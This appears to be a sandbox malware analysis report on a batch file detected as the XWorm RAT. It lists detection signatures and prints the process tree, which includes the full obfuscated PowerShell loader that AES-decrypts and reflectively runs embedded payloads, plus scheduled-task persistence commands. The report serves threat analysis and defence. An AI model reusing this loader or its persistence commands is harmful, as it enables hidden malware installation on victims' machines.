Edit tour
Windows
Analysis Report
PollosAplicaccion.bat
Overview
General Information
| Sample name: | PollosAplicaccion.bat |
| Analysis ID: | 1497352 |
| MD5: | eae7aa8feff31887941d85efc8b29cb7 |
| SHA1: | 78eb93b98393f1f8c5e1445bda9a2a7555f482e0 |
| SHA256: | a924f18d12acc2fcedcbf6a268715ceee220f82d43e34578e3a25df7123c58e4 |
| Infos: |   |
 | |
Detection
XWorm
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 6484 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\Pollo sAplicacci on.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
net.exe (PID: 936 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 2612 cmdline:
C:\Windows \system32\ net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) 
powershell.exe (PID: 6392 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function decrypt_fu nction($pa ram_var){ $aes_var=[ System.Sec urity.Cryp tography.A es]::Creat e(); $aes_ var.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $ae s_var.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7; $aes_ var.Key=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('6VdB mIxfljLUbI X4k/VK2dko JHwWJjnboC EGaiK9Ksk= '); $aes_v ar.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('AfGVni 1E/DgzNaZy r1bq+Q==') ; $decrypt or_var=$ae s_var.Crea teDecrypto r(); $retu rn_var=$de cryptor_va r.Transfor mFinalBloc k($param_v ar, 0, $pa ram_var.Le ngth); $de cryptor_va r.Dispose( ); $aes_va r.Dispose( ); $return _var;}func tion decom press_func tion($para m_var){ $e vPTP=New-O bject Syst em.IO.Memo ryStream(, $param_var ); $Tgngw= New-Object System.IO .MemoryStr eam; $glxB v=New-Obje ct System. IO.Compres sion.GZipS tream($evP TP, [IO.Co mpression. Compressio nMode]::De compress); $glxBv.Co pyTo($Tgng w); $glxBv .Dispose() ; $evPTP.D ispose(); $Tgngw.Dis pose(); $T gngw.ToArr ay();}func tion execu te_functio n($param_v ar,$param2 _var){ $Rj rbO=[Syste m.Reflecti on.Assembl y]::('daoL '[-1..-4] -join '')( [byte[]]$p aram_var); $tvMZN=$R jrbO.Entry Point; $tv MZN.Invoke ($null, $p aram2_var) ;}$dxXqn = 'C:\Users \user\Desk top\Pollos Aplicaccio n.bat';$ho st.UI.RawU I.WindowTi tle = $dxX qn;$qVyct= [System.IO .File]::(' txeTllAdae R'[-1..-11 ] -join '' )($dxXqn). Split([Env ironment]: :NewLine); foreach ($ CWzJO in $ qVyct) { i f ($CWzJO. StartsWith (':: ')) { $xStIY=$C WzJO.Subst ring(3); b reak; }}$p ayloads_va r=[string[ ]]$xStIY.S plit('\'); $payload1_ var=decomp ress_funct ion (decry pt_functio n ([Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')($payloa ds_var[0]) ));$payloa d2_var=dec ompress_fu nction (de crypt_func tion ([Con vert]::('g nirtS46esa BmorF'[-1. .-16] -joi n '')($pay loads_var[ 1])));exec ute_functi on $payloa d1_var $nu ll;execute _function $payload2_ var (,[str ing[]] ('' )); MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3492 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Register-S cheduledTa sk -TaskNa me 'Runtim eBroker_st artup_521_ str' -Trig ger (New-S cheduledTa skTrigger -AtLogon) -Action (N ew-Schedul edTaskActi on -Execut e 'C:\User s\user\App Data\Roami ng\startup _str_521.v bs') -Sett ings (New- ScheduledT askSetting sSet -Allo wStartIfOn Batteries -Hidden -E xecutionTi meLimit 0) -RunLevel Highest - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3568 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wscript.exe (PID: 3504 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\start up_str_521 .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2128 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\startup _str_521.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5224 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - net.exe (PID: 4052 cmdline:
net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 2676 cmdline:
C:\Windows \system32\ net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - powershell.exe (PID: 936 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function decrypt_fu nction($pa ram_var){ $aes_var=[ System.Sec urity.Cryp tography.A es]::Creat e(); $aes_ var.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $ae s_var.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7; $aes_ var.Key=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('6VdB mIxfljLUbI X4k/VK2dko JHwWJjnboC EGaiK9Ksk= '); $aes_v ar.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('AfGVni 1E/DgzNaZy r1bq+Q==') ; $decrypt or_var=$ae s_var.Crea teDecrypto r(); $retu rn_var=$de cryptor_va r.Transfor mFinalBloc k($param_v ar, 0, $pa ram_var.Le ngth); $de cryptor_va r.Dispose( ); $aes_va r.Dispose( ); $return _var;}func tion decom press_func tion($para m_var){ $e vPTP=New-O bject Syst em.IO.Memo ryStream(, $param_var ); $Tgngw= New-Object System.IO .MemoryStr eam; $glxB v=New-Obje ct System. IO.Compres sion.GZipS tream($evP TP, [IO.Co mpression. Compressio nMode]::De compress); $glxBv.Co pyTo($Tgng w); $glxBv .Dispose() ; $evPTP.D ispose(); $Tgngw.Dis pose(); $T gngw.ToArr ay();}func tion execu te_functio n($param_v ar,$param2 _var){ $Rj rbO=[Syste m.Reflecti on.Assembl y]::('daoL '[-1..-4] -join '')( [byte[]]$p aram_var); $tvMZN=$R jrbO.Entry Point; $tv MZN.Invoke ($null, $p aram2_var) ;}$dxXqn = 'C:\Users \user\AppD ata\Roamin g\startup_ str_521.ba t';$host.U I.RawUI.Wi ndowTitle = $dxXqn;$ qVyct=[Sys tem.IO.Fil e]::('txeT llAdaeR'[- 1..-11] -j oin '')($d xXqn).Spli t([Environ ment]::New Line);fore ach ($CWzJ O in $qVyc t) { if ($ CWzJO.Star tsWith(':: ')) { $xS tIY=$CWzJO .Substring (3); break ; }}$paylo ads_var=[s tring[]]$x StIY.Split ('\');$pay load1_var= decompress _function (decrypt_f unction ([ Convert]:: ('gnirtS46 esaBmorF'[ -1..-16] - join '')($ payloads_v ar[0])));$ payload2_v ar=decompr ess_functi on (decryp t_function ([Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )($payload s_var[1])) );execute_ function $ payload1_v ar $null;e xecute_fun ction $pay load2_var (,[string[ ]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9) - schtasks.exe (PID: 6084 cmdline:
"C:\Window s\System32 \schtasks. exe" /crea te /f /RL HIGHEST /s c minute / mo 1 /tn " e45iasd" / tr "C:\Use rs\user\e4 5iasd.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 5140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 3136 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\App Data\Roami ng\startup _str_521.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- e45iasd.exe (PID: 5020 cmdline:
C:\Users\u ser\e45ias d.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6252 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 6068 cmdline:
"C:\Users\ user\e45ia sd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 6768 cmdline:
"C:\Users\ user\e45ia sd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Thomas Patzke: | ||